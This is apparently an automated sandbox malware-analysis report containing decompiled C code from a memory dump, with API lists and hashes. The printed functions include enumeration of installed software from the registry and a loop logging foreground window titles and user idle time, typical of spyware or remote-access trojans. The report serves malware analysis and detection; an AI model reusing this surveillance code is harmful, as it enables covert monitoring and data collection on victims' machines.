                																												__eflags = _t291;
                																												if(_t291 != 0) {
                																													_push(_t221);
                																													_t223 = 0;
                																													_t156 = _t291;
                																													_t263 = 0;
                																													_v20 = 0;
                																													_push(_t305);
                																													__eflags =  *_t291;
                																													if( *_t291 != 0) {
                																														do {
                																															_t156 =  &(_t156[1]);
                																															_t263 = _t263 + 1;
                																															__eflags =  *_t156;
                																														} while ( *_t156 != 0);
                																													}
                																													_t104 = _t263 + 1; // 0x2
                																													_t306 = E004443F4(_t263, _t104, 4);
                																													__eflags = _t306;
                																													if(_t306 == 0) {
                																														L119:
                																														E004449F5(_t223, _t284, _t291, _t306);
                																														goto L120;
                																													} else {
                																														__eflags =  *_t291 - _t223;
                																														if( *_t291 == _t223) {
                																															L117:
                																															E00445002(_t223);
                																															_t167 = _t306;
                																															goto L118;
                																														} else {
                																															_t223 = _t306 - _t291;
                																															__eflags = _t223;
                																															do {
                																																_t267 =  *_t291;
                																																_t105 = _t267 + 2; // 0x6
                																																_t284 = _t105;
                																																do {
                																																	_t168 =  *_t267;
                																																	_t267 = _t267 + 2;
                																																	__eflags = _t168 - _v20;
                																																} while (_t168 != _v20);
                																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
                																																_v24 = _t107;
                																																 *(_t223 + _t291) = E004443F4(_t267 - _t284 >> 1, _t107, 2);
                																																E00445002(0);
                																																_t323 = _t323 + 0xc;
                																																__eflags =  *(_t223 + _t291);
                																																if( *(_t223 + _t291) == 0) {
                																																	goto L119;
                																																} else {
                																																	_t173 = E004463E1( *(_t223 + _t291), _v24,  *_t291);
                																																	_t323 = _t323 + 0xc;
                																																	__eflags = _t173;
                																																	if(_t173 != 0) {
                																																		L120:
                																																		_push(0);
                																																		_push(0);
                																																		_push(0);
                																																		_push(0);
                																																		_push(0);
                																																		E0043A5E8();
                																																		asm("int3");
                																																		_push(_t318);
                																																		_push(_t223);
                																																		_push(_t306);
                																																		_push(_t291);
                																																		_t292 =  *0x4704e0; // 0x13f4478
                																																		_t307 = _t292;
                																																		__eflags =  *_t292;
                																																		if( *_t292 == 0) {
                																																			L127:
                																																			_t308 = _t307 - _t292;
                																																			__eflags = _t308;
                																																			_t310 =  ~(_t308 >> 2);
                																																		} else {
                																																			_t225 = _v8;
                																																			do {
                																																				_t163 = E004481E9(_v12,  *_t307, _t225);
                																																				_t323 = _t323 + 0xc;
                																																				__eflags = _t163;
                																																				if(_t163 != 0) {
                																																					goto L126;
                																																				} else {
                																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
                																																					__eflags = _t165 - 0x3d;
                																																					if(_t165 == 0x3d) {
                																																						L129:
                																																						_t310 = _t307 - _t292 >> 2;
                																																					} else {
                																																						__eflags = _t165;
                																																						if(_t165 == 0) {
                																																							goto L129;
                																																						} else {
                																																							goto L126;
                																																						}
                																																					}
                																																				}
                																																				goto L128;
                																																				L126:
                																																				_t307 =  &(_t307[1]);
                																																				__eflags =  *_t307;
                																																			} while ( *_t307 != 0);
                																																			goto L127;
                																																		}
                																																		L128:
                																																		return _t310;
                																																	} else {
                																																		goto L115;
                																																	}
                																																}
                																																goto L130;
                																																L115:
                																																_t291 = _t291 + 4;
                																																__eflags =  *_t291 - _t173;
                																															} while ( *_t291 != _t173);
                																															_t223 = 0;
                																															__eflags = 0;
                																															goto L117;
                																														}
                																													}
                																												} else {
                																													_t167 = 0;
                																													L118:
                																													return _t167;
                																												}
                																											} else {
                																												goto L98;
                																											}
                																										}
                																										goto L130;
                																										L98:
                																										_t290 = _t290 + 4;
                																										__eflags =  *_t290 - _t180;
                																									} while ( *_t290 != _t180);
                																									goto L100;
                																								}
                																							}
                																						} else {
                																							_t175 = 0;
                																							L101:
                																							return _t175;
                																						}
                																					} else {
                																						_t274 =  &(_t304[_v20 + 1]);
                																						 *(_t274 - 2) = _t148;
                																						asm("sbb eax, eax");
                																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
                																						__eflags = _t185;
                																						if(_t185 == 0) {
                																							_t186 = E0043EEAD();
                																							_t221 = _t221 | 0xffffffff;
                																							__eflags = _t221;
                																							 *_t186 = 0x2a;
                																						}
                																						goto L85;
                																					}
                																				}
                																			}
                																		}
                																	}
                																} else {
                																	_t191 =  *0x4704e0; // 0x13f4478
                																	__eflags = _a4 - _t221;
                																	if(_a4 == _t221) {
                																		L58:
                																		__eflags = _t246;
                																		if(_t246 != 0) {
                																			goto L56;
                																		} else {
                																			__eflags = _t191;
                																			if(_t191 != 0) {
                																				L62:
                																				 *0x4704e4 = E004443F4(_t246, 1, 4);
                																				E00445002(_t221);
                																				_t322 = _t322 + 0xc;
                																				goto L63;
                																			} else {
                																				 *0x4704e0 = E004443F4(_t246, 1, 4);
                																				E00445002(_t221);
                																				_t322 = _t322 + 0xc;
                																				__eflags =  *0x4704e0 - _t221; // 0x13f4478
                																				if(__eflags == 0) {
                																					goto L55;
                																				} else {
                																					_t302 =  *0x4704e4; // 0x13fb350
                																					__eflags = _t302;
                																					if(_t302 != 0) {
                																						goto L64;
                																					} else {
                																						goto L62;
                																					}
                																				}
                																			}
                																		}
                																	} else {
                																		__eflags = _t191;
                																		if(_t191 == 0) {
                																			goto L58;
                																		} else {
                																			_t196 = L004424A7(_t221);
                																			__eflags = _t196;
                																			if(_t196 != 0) {
                																				L63:
                																				_t302 =  *0x4704e4; // 0x13fb350
                																				__eflags = _t302;
                																				if(_t302 == 0) {
                																					L55:
                																					_t221 = _t220 | 0xffffffff;
                																					__eflags = _t221;
                																					L56:
                																					E00445002(_t288);
                																					_t136 = _t221;
                																					goto L57;
                																				} else {
                																					goto L64;
                																				}
                																			} else {
                																				goto L54;
                																			}
                																		}
                																	}
                																}
                															}
                														}
                													} else {
                														_t197 = E0043EEAD();
                														 *_t197 = 0x16;
                														_t136 = _t197 | 0xffffffff;
                														L57:
                														return _t136;
                													}
                												} else {
                													_t280 = _v16 + 1 + _t300 - _a4;
                													asm("sbb eax, eax");
                													 *(_t280 - 1) = _t218;
                													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
                													__eflags = _t204;
                													if(_t204 == 0) {
                														_t205 = E0043EEAD();
                														_t218 = _t218 | 0xffffffff;
                														__eflags = _t218;
                														 *_t205 = 0x2a;
                													}
                													goto L42;
                												}
                											}
                										}
                									}
                								}
                							} else {
                								__eflags = _a8;
                								if(_a8 == 0) {
                									L14:
                									__eflags = _t120;
                									if(_t120 == 0) {
                										 *0x4704e0 = E004443F4(_t231, 1, 4);
                										E00445002(_t218);
                										_t298 =  *0x4704e0; // 0x13f4478
                										_t320 = _t320 + 0xc;
                										__eflags = _t298;
                										if(_t298 == 0) {
                											goto L11;
                										} else {
                											__eflags =  *0x4704e4 - _t218; // 0x13fb350
                											if(__eflags != 0) {
                												goto L20;
                											} else {
                												 *0x4704e4 = E004443F4(_t231, 1, 4);
                												E00445002(_t218);
                												_t320 = _t320 + 0xc;
                												__eflags =  *0x4704e4 - _t218; // 0x13fb350
                												if(__eflags == 0) {
                													goto L11;
                												} else {
                													goto L19;
                												}
                											}
                										}
                									} else {
                										_t218 = 0;
                										goto L12;
                									}
                								} else {
                									__eflags =  *0x4704e4 - _t218; // 0x13fb350
                									if(__eflags == 0) {
                										goto L14;
                									} else {
                										_t214 = L004424A2(0);
                										__eflags = _t214;
                										if(_t214 != 0) {
                											L19:
                											_t298 =  *0x4704e0; // 0x13f4478
                											L20:
                											__eflags = _t298;
                											if(_t298 == 0) {
                												L11:
                												_t218 = _t217 | 0xffffffff;
                												__eflags = _t218;
                												L12:
                												E00445002(_t286);
                												_t119 = _t218;
                												goto L13;
                											} else {
                												goto L21;
                											}
                										} else {
                											goto L10;
                										}
                									}
                								}
                							}
                						}
                					}
                				} else {
                					_t215 = E0043EEAD();
                					 *_t215 = 0x16;
                					_t119 = _t215 | 0xffffffff;
                					L13:
                					return _t119;
                				}
                				L130:
                			}
                0x0044e247
                0x0044e24c
                0x0044e24f
                0x0044e253
                0x00000000
                0x0044e255
                0x0044e25d
                0x0044e262
                0x0044e265
                0x0044e267
                0x0044e287
                0x0044e289
                0x0044e28a
                0x0044e28b
                0x0044e28c
                0x0044e28d
                0x0044e28e
                0x0044e293
                0x0044e296
                0x0044e299
                0x0044e29a
                0x0044e29b
                0x0044e29c
                0x0044e2a2
                0x0044e2a4
                0x0044e2a7
                0x0044e2d3
                0x0044e2d3
                0x0044e2d3
                0x0044e2d8
                0x0044e2a9
                0x0044e2a9
                0x0044e2ac
                0x0044e2b2
                0x0044e2b7
                0x0044e2ba
                0x0044e2bc
                0x00000000
                0x0044e2be
                0x0044e2c0
                0x0044e2c3
                0x0044e2c5
                0x0044e2e1
                0x0044e2e3
                0x0044e2c7
                0x0044e2c7
                0x0044e2c9
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0044e2c9
                0x0044e2c5
                0x00000000
                0x0044e2cb
                0x0044e2cb
                0x0044e2ce
                0x0044e2ce
                0x00000000
                0x0044e2ac
                0x0044e2da
                0x0044e2e0
                0x00000000
                0x00000000
                0x00000000
                0x0044e267
                0x00000000
                0x0044e269
                0x0044e269
                0x0044e26c
                0x0044e26c
                0x0044e270
                0x0044e270
                0x00000000
                0x0044e270
                0x0044e218
                0x0044e1e5
                0x0044e1e5
                0x0044e27d
                0x0044e281
                0x0044e281
                0x00000000
                0x00000000
                0x00000000
                0x0044e1aa
                0x00000000
                0x0044e1ac
                0x0044e1ac
                0x0044e1af
                0x0044e1af
                0x00000000
                0x0044e1b3
                0x0044e162
                0x0044e133
                0x0044e133
                0x0044e1bf
                0x0044e1c3
                0x0044e1c3
                0x0044e0dd
                0x0044e0e1
                0x0044e0e4
                0x0044e0ee
                0x0044e0f6
                0x0044e0fc
                0x0044e0fe
                0x0044e100
                0x0044e105
                0x0044e105
                0x0044e108
                0x0044e108
                0x00000000
                0x0044e0fe
                0x0044e0db
                0x0044e0c7
                0x0044e099
                0x0044dffa
                0x0044df55
                0x0044df55
                0x0044df5a
                0x0044df5d
                0x0044df8a
                0x0044df8a
                0x0044df8c
                0x00000000
                0x0044df8e
                0x0044df8e
                0x0044df90
                0x0044dfbb
                0x0044dfc5
                0x0044dfca
                0x0044dfcf
                0x00000000
                0x0044df92
                0x0044df9c
                0x0044dfa1
                0x0044dfa6
                0x0044dfa9
                0x0044dfaf
                0x00000000
                0x0044dfb1
                0x0044dfb1
                0x0044dfb7
                0x0044dfb9
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0044dfb9
                0x0044dfaf
                0x0044df90
                0x0044df5f
                0x0044df5f
                0x0044df61
                0x00000000
                0x0044df63
                0x0044df63
                0x0044df68
                0x0044df6a
                0x0044dfd2
                0x0044dfd2
                0x0044dfd8
                0x0044dfda
                0x0044df77
                0x0044df77
                0x0044df77
                0x0044df7a
                0x0044df7b
                0x0044df82
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0044df6a
                0x0044df61
                0x0044df5d
                0x0044df4f
                0x0044df1f
                0x0044def8
                0x0044def8
                0x0044defd
                0x0044df03
                0x0044df85
                0x0044df89
                0x0044df89
                0x0044de9d
                0x0044dea6
                0x0044deae
                0x0044deb2
                0x0044deb9
                0x0044debf
                0x0044dec1
                0x0044dec3
                0x0044dec8
                0x0044dec8
                0x0044decb
                0x0044decb
                0x00000000
                0x0044dec1
                0x0044de9b
                0x0044de88
                0x0044de60
                0x0044ddc1
                0x0044dd1a
                0x0044dd1a
                0x0044dd1d
                0x0044dd4e
                0x0044dd4e
                0x0044dd50
                0x0044dd60
                0x0044dd65
                0x0044dd6a
                0x0044dd70
                0x0044dd73
                0x0044dd75
                0x00000000
                0x0044dd77
                0x0044dd77
                0x0044dd7d
                0x00000000
                0x0044dd7f
                0x0044dd89
                0x0044dd8e
                0x0044dd93
                0x0044dd96
                0x0044dd9c
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0044dd9c
                0x0044dd7d
                0x0044dd52
                0x0044dd52
                0x00000000
                0x0044dd52
                0x0044dd1f
                0x0044dd1f
                0x0044dd25
                0x00000000
                0x0044dd27
                0x0044dd27
                0x0044dd2c
                0x0044dd2e
                0x0044dd9e
                0x0044dd9e
                0x0044dda4
                0x0044dda4
                0x0044dda6
                0x0044dd3b
                0x0044dd3b
                0x0044dd3b
                0x0044dd3e
                0x0044dd3f
                0x0044dd46
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0044dd2e
                0x0044dd25
                0x0044dd1d
                0x0044dd14
                0x0044dce4
                0x0044dcbd
                0x0044dcbd
                0x0044dcc2
                0x0044dcc8
                0x0044dd49
                0x0044dd4d
                0x0044dd4d
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$EnvironmentVariable$_wcschr
                • String ID:
                • API String ID: 3899193279-0
                • Opcode ID: dcae89719070f5e43a69685a16df3d7dfddf94d936716f055945bb6679d207b1
                • Instruction ID: 70a147eeefff8d80a420db1d2de74d9c70af01ffcddfc6d33a5ace776a2fbf8c
                • Opcode Fuzzy Hash: dcae89719070f5e43a69685a16df3d7dfddf94d936716f055945bb6679d207b1
                • Instruction Fuzzy Hash: B0D137B1D01701ABFB30AF76D882A6E7BA4AF05718F04456FF94597382EB3D9840879C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004140CD() {
                				char _v264;
                				char _v532;
                				intOrPtr _v536;
                				CHAR* _v540;
                				intOrPtr _v544;
                				CHAR* _v548;
                				intOrPtr _v552;
                				_Unknown_base(*)()* _t42;
                				signed int _t52;
                				struct HINSTANCE__* _t54;
                				struct HINSTANCE__* _t57;
                				intOrPtr* _t63;
                				void* _t64;
                
                				 *_t63 = "getaddrinfo";
                				_v552 = E00413C51;
                				_v548 = "getnameinfo";
                				_v544 = E00413EF7;
                				_v540 = "freeaddrinfo";
                				_v536 = E00413C16;
                				if( *0x474a88 == 0) {
                					if(GetSystemDirectoryA( &_v264, 0x104) != 0) {
                						E0044030E( &_v532, 0x10c,  &_v264);
                						E00440368( &_v532, 0x10c, "\\ws2_32");
                						_t64 = _t63 + 0x18;
                						_t57 = LoadLibraryA( &_v532);
                						_t54 = 0;
                						if(_t57 == 0) {
                							L6:
                							E0044030E( &_v532, 0x10c,  &_v264);
                							E00440368( &_v532, 0x10c, "\\wship6");
                							_t64 = _t64 + 0x18;
                							_t57 = LoadLibraryA( &_v532);
                							if(_t57 != 0) {
                								if(GetProcAddress(_t57, "getaddrinfo") == 0) {
                									FreeLibrary(_t57);
                									_t57 = _t54;
                								}
                								if(_t57 != 0) {
                									goto L10;
                								}
                							}
                						} else {
                							if(GetProcAddress(_t57, "getaddrinfo") == 0) {
                								FreeLibrary(_t57);
                								_t57 = 0;
                							}
                							if(_t57 != 0) {
                								L10:
                								_t52 = _t54;
                								while(1) {
                									_t42 = GetProcAddress(_t57,  *(_t64 + 0x10 + _t52 * 8));
                									 *(_t64 + 0x14 + _t52 * 8) = _t42;
                									if(_t42 == 0) {
                										break;
                									}
                									_t52 = _t52 + 1;
                									if(_t52 < 3) {
                										continue;
                									} else {
                									}
                									L15:
                									if(_t57 != 0) {
                										do {
                											 *((intOrPtr*)(_t54 + 0x46f9fc)) =  *((intOrPtr*)(_t64 + _t54 + 0x14));
                											_t54 = _t54 + 8;
                										} while (_t54 < 0x18);
                									}
                									goto L17;
                								}
                								FreeLibrary(_t57);
                								_t57 = _t54;
                								goto L15;
                							} else {
                								goto L6;
                							}
                						}
                						L17:
                					}
                					 *0x474a88 = 1;
                				}
                				return  *0x46f9fc;
                 			}

                APIs
                • GetSystemDirectoryA.KERNEL32 ref: 0041411C
                • LoadLibraryA.KERNEL32(?), ref: 0041415E
                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041417E
                • FreeLibrary.KERNEL32(00000000), ref: 00414185
                • LoadLibraryA.KERNEL32(?), ref: 004141BD
                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004141CF
                • FreeLibrary.KERNEL32(00000000), ref: 004141D6
                • GetProcAddress.KERNEL32(00000000,?), ref: 004141E5
                • FreeLibrary.KERNEL32(00000000), ref: 004141FC
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                • API String ID: 2490988753-744132762
                • Opcode ID: d30bf5144b07c6523917f2ebe4b756d5bb383713da0f8795a0bb91b899a473ae
                • Instruction ID: ec032a2b9b2afcf1944104fdbdee5c9b5016f8d194ad9eb48286684fedf55356
                • Opcode Fuzzy Hash: d30bf5144b07c6523917f2ebe4b756d5bb383713da0f8795a0bb91b899a473ae
                • Instruction Fuzzy Hash: 4A31B1B250671167D320DF65DC48ECB7ADCAB84794F040A6AF844A3201E73CDAD48BAF
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E0041B008(void* __ebx, void* __ecx, void* __edx) {
                				char _v1028;
                				char _v1052;
                				void* _v1056;
                				char _v1076;
                				void* _v1080;
                				char _v1100;
                				void* _v1104;
                				char _v1124;
                				void* _v1128;
                				char _v1148;
                				void* _v1152;
                				char _v1172;
                				void* _v1176;
                				char _v1196;
                				void* _v1200;
                				char _v1220;
                				void* _v1224;
                				char _v1244;
                				void* _v1248;
                				char _v1268;
                				void* _v1272;
                				char _v1292;
                				void* _v1296;
                				char _v1316;
                				void* _v1320;
                				char _v1340;
                				char _v1364;
                				char _v1388;
                				char _v1412;
                				char _v1436;
                				char _v1460;
                				void* _v1464;
                				char _v1484;
                				int _v1488;
                				void* _v1492;
                				void* _v1496;
                				void* __edi;
                				void* __ebp;
                				long _t73;
                				long _t79;
                				int _t86;
                				void* _t188;
                				int _t207;
                				void* _t208;
                				void* _t210;
                				void** _t211;
                
                				_t188 = __edx;
                				_t130 = __ebx;
                				_t211 =  &_v1496;
                				_t208 = __ecx;
                				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v1492) == 0) {
                					_v1488 = 0x400;
                					_t207 = 0;
                					E00401F66(__ebx,  &_v1460);
                					_t73 = RegEnumKeyExA(_v1492, 0,  &_v1028,  &_v1488, 0, 0, 0, 0);
                					_t210 = RegCloseKey;
                					while(1) {
                						__eflags = _t73 - 0x103;
                						if(__eflags == 0) {
                							break;
                						}
                						__eflags = _t73;
                						if(_t73 != 0) {
                							L8:
                							_t207 = _t207 + 1;
                							__eflags = _t207;
                							_v1488 = 0x400;
                						} else {
                							_t79 = RegOpenKeyExA(_v1492,  &_v1028, 0, 0x20019,  &_v1496);
                							__eflags = _t79;
                							if(_t79 == 0) {
                								E0041296F( &_v1484, _v1496, L"DisplayName");
                								 *_t211 = L"Publisher";
                								E0041296F( &_v1340, _v1496);
                								 *_t211 = L"DisplayVersion";
                								E0041296F( &_v1364, _v1496);
                								 *_t211 = L"InstallLocation";
                								E0041296F( &_v1388, _v1496);
                								 *_t211 = L"InstallDate";
                								E0041296F( &_v1412, _v1496);
                								 *_t211 = L"UninstallString";
                								E0041296F( &_v1436, _v1496);
                								_t86 = E0040619C();
                								__eflags = _t86;
                								if(_t86 == 0) {
                									E0040323D(E00402FF4(_t130,  &_v1316, E00402FF4(_t130,  &_v1292, E004042FD(_t130,  &_v1268, E00402FF4(_t130,  &_v1244, E004042FD(_t130,  &_v1220, E00402FF4(_t130,  &_v1196, E004042FD(_t130,  &_v1172, E00402FF4(_t130,  &_v1148, E004042FD(_t130,  &_v1124, E00402FF4(_t130,  &_v1100, E004042FD(_t130,  &_v1076, E004087F0( &_v1052,  &_v1484, _t210, "\t"), _t210, __eflags,  &_v1364), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1412), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1340), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1388), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1436), _t207, _t210, __eflags, _t149), _t207, _t210, __eflags, "\n"));
                									E00401EE9();
                									E00401EE9();
                									E00401EE9();
                									E00401EE9();
                									E00401EE9();
                									E00401EE9();
                									E00401EE9();
                									E00401EE9();
                									E00401EE9();
                									E00401EE9();
                									E00401EE9();
                									E00401EE9();
                								}
                								RegCloseKey(_v1496);
                								E00401EE9();
                								E00401EE9();
                								E00401EE9();
                								E00401EE9();
                								E00401EE9();
                								E00401EE9();
                								goto L8;
                							}
                						}
                						__eflags = 0;
                						_t73 = RegEnumKeyExA(_v1492, _t207,  &_v1028,  &_v1488, 0, 0, 0, 0);
                					}
                					RegCloseKey(_v1492);
                					E00403242(_t130, _t208, _t210, __eflags,  &_v1460);
                					E00401EE9();
                				} else {
                					E0040415E(__ebx, _t208, _t188, 0, 0x46a8f0);
                				}
                				return _t208;
                 			}

                APIs
                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B02A
                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B06E
                • RegCloseKey.ADVAPI32(?), ref: 0041B338
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseEnumOpen
                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                • API String ID: 1332880857-3714951968
                • Opcode ID: caa8abd2def5c508c163a2c121a583cfa03ca2e495a1e4b2994f93ac4004333b
                • Instruction ID: 996ba4e169512d105bf10ccdef0111c5bf25efe0ecf00969fbd19f1ec1e96d73
                • Opcode Fuzzy Hash: caa8abd2def5c508c163a2c121a583cfa03ca2e495a1e4b2994f93ac4004333b
                • Instruction Fuzzy Hash: 688123711082459BD324EB51D891EEFB3E8EF94308F50493FF586921D2EF349949CA9A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E0040A249(void* __ecx, void* __edx) {
                				char _v28;
                				char _v56;
                				char _v76;
                				char _v80;
                				char _v100;
                				void* _v104;
                				char _v108;
                				char _v112;
                				struct HWND__* _v116;
                				void* __ebx;
                				void* __edi;
                				void* __ebp;
                				int _t36;
                				struct HWND__* _t42;
                				void* _t50;
                				int _t57;
                				struct HWND__* _t77;
                				void* _t119;
                				void* _t125;
                				signed int _t126;
                				void* _t128;
                
                				_t112 = __edx;
                				_t128 = (_t126 & 0xfffffff8) - 0x74;
                				_push(_t77);
                				_push(0xea60);
                				_t119 = __ecx;
                				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                					Sleep(0x1f4);
                					_t77 = GetForegroundWindow();
                					_t36 = GetWindowTextLengthW(_t77);
                					_t4 = _t36 + 1; // 0x1
                					E0040AE7E(_t77,  &_v100, _t112, _t119, _t125, _t4, 0);
                					if(_t36 != 0) {
                						_t57 = E0040245C();
                						GetWindowTextW(_t77, E00401EE4( &_v100), _t57);
                						_t112 = 0x474c34;
                						if(E0040AF46(0x474c34) == 0) {
                							E0040AE66(0x474c34,  &_v100);
                							E004086B8(E0040245C() - 1);
                							_t128 = _t128 - 0x18;
                							_t137 =  *0x47308b;
                							if( *0x47308b == 0) {
                								_t112 = E0040AEF6( &_v76, L"\r\n[", _t125,  &_v108);
                								E00402FF4(_t77, _t128, _t67, _t119, _t125, __eflags, L"]\r\n");
                								E00409BA9(_t119);
                								E00401EE9();
                							} else {
                								E004086D0(_t77, _t128, 0x474c34, _t137,  &_v108);
                								E0040A6DA(_t77, _t119, _t137);
                							}
                						}
                					}
                					_t83 = _t119;
                					E0040ACBE(_t119);
                					if(E0041A641(_t119) < 0xea60) {
                						L18:
                						E00401EE9();
                						continue;
                					} else {
                						_t77 = _v116;
                						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                							_t42 = E0041A641(_t83);
                							if(_t42 < 0xea60) {
                								__eflags = _t77 % 0xea60;
                								E00440751(_t83, _t77 / 0xea60,  &_v112, 0xa);
                								_t50 = E00408832(_t77,  &_v80, E004052DD(_t77,  &_v56, "\r\n{ User has been idle for ", _t125, __eflags, E00402073(_t77,  &_v28, _t77 % 0xea60, _t125,  &_v112)), _t119, _t125, __eflags, " minutes }\r\n");
                								_t128 = _t128 + 0xc - 0x14;
                								_t112 = _t50;
                								E0041A7B9(_t128, _t50);
                								E00409BA9(_t119);
                								E00401FB8();
                								E00401FB8();
                								E00401FB8();
                								goto L18;
                							}
                							_t77 = _t42;
                							_v116 = _t77;
                							Sleep(0x3e8);
                						}
                						E00401EE9();
                						break;
                					}
                				}
                				__eflags = 0;
                				return 0;
                 			}

                APIs
                • __Init_thread_footer.LIBCMT ref: 0040A2AB
                • Sleep.KERNEL32(000001F4), ref: 0040A2B6
                • GetForegroundWindow.USER32 ref: 0040A2BC
                • GetWindowTextLengthW.USER32(00000000), ref: 0040A2C5
                • GetWindowTextW.USER32 ref: 0040A2F9
                • Sleep.KERNEL32(000003E8), ref: 0040A3C7
                  • Part of subcall function 00409BA9: SetEvent.KERNEL32(?,?,00000000,0040A780,00000000), ref: 00409BD5
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                • String ID: [${ User has been idle for $ minutes }$4LG$4LG$4LG$]
                • API String ID: 911427763-2724478313
                • Opcode ID: 560d23aef3dedd24e24c6dd58de219cfa617ce7004318b0a0caaee29960e069e
                • Instruction ID: e6d26ec29f6efd9614cca4dfe6135636dd5a7624a68a80ed8f9da63f1efc7c64
                • Opcode Fuzzy Hash: 560d23aef3dedd24e24c6dd58de219cfa617ce7004318b0a0caaee29960e069e
                • Instruction Fuzzy Hash: 3351C3316083405BC314FB71D886A6F77A5AB94308F40097FF886A62E2DF7C9A55C69F
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 64%
                			E0041BE9A(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                				struct tagPOINT _v12;
                				void* _t16;
                				struct HMENU__* _t17;
                				void* _t20;
                				void* _t24;
                
                				_t16 = _a8 - 1;
                				if(_t16 == 0) {
                					_t17 = CreatePopupMenu();
                					 *0x472b1c = _t17;
                					AppendMenuA(_t17, 0, 0, "Close");
                					L15:
                					return 0;
                				}
                				_t20 = _t16 - 0x110;
                				if(_t20 == 0) {
                					if(_a12 != 0) {
                						goto L15;
                					}
                					Shell_NotifyIconA(2, 0x472b20);
                					ExitProcess(0);
                				}
                				if(_t20 == 0x2f0) {
                					_t24 = _a16 - 0x201;
                					if(_t24 == 0) {
                						if(IsWindowVisible( *0x472b10) == 0) {
                							ShowWindow( *0x472b10, 9);
                							SetForegroundWindow( *0x472b10);
                						} else {
                							ShowWindow( *0x472b10, 0);
                						}
                						goto L15;
                					}
                					if(_t24 == 3) {
                						GetCursorPos( &_v12);
                						SetForegroundWindow(_a4);
                						TrackPopupMenu( *0x472b1c, 0, _v12, _v12.y, 0, _a4, 0);
                						goto L15;
                					}
                					_push(_a16);
                					_push(_a12);
                					_push(0x401);
                					L7:
                					return DefWindowProcA(_a4, ??, ??, ??);
                				}
                				_push(_a16);
                				_push(_a12);
                				_push(_a8);
                				goto L7;
                			}

                APIs
                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041BEE5
                • GetCursorPos.USER32(?), ref: 0041BEF4
                • SetForegroundWindow.USER32(?), ref: 0041BEFD
                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041BF17
                • Shell_NotifyIconA.SHELL32(00000002,00472B20), ref: 0041BF68
                • ExitProcess.KERNEL32 ref: 0041BF70
                • CreatePopupMenu.USER32 ref: 0041BF76
                • AppendMenuA.USER32 ref: 0041BF8B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                • String ID: Close
                • API String ID: 1657328048-3535843008
                • Opcode ID: 671d0a36089a7764a87accef62fbf46538a6333771b6ae1721ed7aed7857f9ea
                • Instruction ID: dfe43188851c1a6f81b140f94b5f6a7c696d7e25908ee8c8785907bb885635e0
                • Opcode Fuzzy Hash: 671d0a36089a7764a87accef62fbf46538a6333771b6ae1721ed7aed7857f9ea
                • Instruction Fuzzy Hash: AC212631108209BFDB054FA4ED0DEAA3B65FB08312F104539FE05A01B1D7B6D9A1EF59
                Uniqueness

